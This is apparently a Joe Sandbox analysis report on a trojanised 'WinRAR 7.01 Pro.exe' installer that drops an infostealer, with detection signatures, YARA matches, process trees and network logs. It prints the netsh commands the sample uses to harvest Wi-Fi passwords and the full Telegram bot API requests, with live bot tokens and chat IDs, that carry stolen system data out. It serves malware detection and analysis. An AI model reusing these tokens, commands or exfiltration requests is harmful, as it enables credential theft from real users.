Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WinRAR 7.01 Pro.exe

Overview

General Information

Sample name:WinRAR 7.01 Pro.exe
Analysis ID:1492461
MD5:1c8908102946928867ab16f2007b35cc
SHA1:7e08b98299e0195a013e53221e3c2efb149eb4ce
SHA256:e3635b82438e536636955e2fee251073b1038a7e00295a1e0efb003ad49965d5
Tags:exe
Infos:

Detection

PureLog Stealer, WorldWind Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected WorldWind Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious desktop.ini Action
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • WinRAR 7.01 Pro.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\WinRAR 7.01 Pro.exe" MD5: 1C8908102946928867AB16F2007B35CC)
    • winrar_x64_701ar.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe" MD5: 5E2849BEF6A38ED0B163EA6128AFEA01)
    • _microsoft_corporation.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe" MD5: B2795FBED63C8C1B0846B3EAEAE2FE0F)
      • cmd.exe (PID: 3264 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7996 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 7420 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • findstr.exe (PID: 3544 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8024 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 8008 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 2104 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
WinRAR 7.01 Pro.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d623:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x5f3:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0xc73:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1f2fd:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1ef43:$s5: delete[]
  • 0xbe268:$s5: delete[]
  • 0x1e3fb:$s6: constructor or from DllMain.
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      3.0._microsoft_corporation.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.
      0.2.WinRAR 7.01 Pro.exe.3b4c9f8.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.
      3.3._microsoft_corporation.exe.26bbf08.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        3.3._microsoft_corporation.exe.26bbf08.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.WinRAR 7.01 Pro.exe.3785570.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x3e4538:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x3c7508:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x3c7b88:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x3e6212:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x440f0:$s5: delete[]
          • 0x3e5e58:$s5: delete[]
          • 0x3e5310:$s6: constructor or from DllMain.
          Click to see the 2 entries

          System Summary

          barindex
          Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, ProcessId: 7740, TargetFilename: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

          Stealing of Sensitive Information

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, ParentProcessId: 7740, ParentProcessName: _microsoft_corporation.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 3264, ProcessName: cmd.exe
          Timestamp:2024-08-13T21:48:56.915212+0200
          SID:2044766
          Severity:1
          Source Port:49743
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-08-13T21:48:58.465995+0200
          SID:2803305
          Severity:3
          Source Port:49744
          Destination Port:443
          Protocol:TCP
          Classtype:Unknown Traffic
          Timestamp:2024-08-13T21:49:01.755507+0200
          SID:2044557
          Severity:1
          Source Port:49746
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: WinRAR 7.01 Pro.exeAvira: detected
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeReversingLabs: Detection: 62%
          Source: WinRAR 7.01 Pro.exeReversingLabs: Detection: 44%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeJoe Sandbox ML: detected
          Source: WinRAR 7.01 Pro.exeJoe Sandbox ML: detected
          Source: WinRAR 7.01 Pro.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: WinRAR 7.01 Pro.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: winload_prod.pdb source: Temp.txt.3.dr
          Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar_x64_701ar.exe, 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, winrar_x64_701ar.exe, 00000001.00000000.1732532054.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr
          Source: Binary string: ntkrnlmp.pdb source: Temp.txt.3.dr
          Source: Binary string: winload_prod.pdb\ source: Temp.txt.3.dr
          Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.3.dr
          Source: Binary string: _.pdb source: _microsoft_corporation.exe, 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\AppData\Local\Temporary Projects\WinRAR 7.01 Pro\obj\x86\Debug\WinRAR 7.01 Pro.pdb source: WinRAR 7.01 Pro.exe
          Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar_x64_701ar.exe, 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, winrar_x64_701ar.exe, 00000001.00000000.1732532054.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB34D0 SendDlgItemMessageW,GetDlgItem,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,1_2_00007FF6C3BB34D0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC9B40 FindFirstFileExW,1_2_00007FF6C3BC9B40
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BA1F08 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00007FF6C3BA1F08
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.4:49743 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.4:49743 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2044557 - Severity 1 - ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) : 192.168.2.4:49746 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
          Source: global trafficHTTP traffic detected: POST /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271 HTTP/1.1Content-Type: multipart/form-data; boundary="aa5c6f7f-c3cb-4f2d-8452-b3f0b7049636"Host: api.telegram.orgContent-Length: 162674Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1Content-Type: multipart/form-data; boundary="54c32106-8dd3-4cf7-866e-0576783efbb1"Host: api.telegram.orgContent-Length: 162674Expect: 100-continue
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 104.21.44.66 104.21.44.66
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: icanhazip.com
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 149.154.167.220:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: 238.14.8.0.in-addr.arpa
          Source: global trafficDNS traffic detected: DNS query: icanhazip.com
          Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271 HTTP/1.1Content-Type: multipart/form-data; boundary="aa5c6f7f-c3cb-4f2d-8452-b3f0b7049636"Host: api.telegram.orgContent-Length: 162674Expect: 100-continue
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: winrar_x64_701ar.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: winrar_x64_701ar.exe, 00000001.00000003.2388750419.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2532236654.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2557756469.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247129053.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2389356453.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247591489.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2556818350.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3kI
          Source: winrar_x64_701ar.exe, 00000001.00000003.2388750419.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2532236654.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2557756469.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247129053.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2389356453.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247591489.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2556818350.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
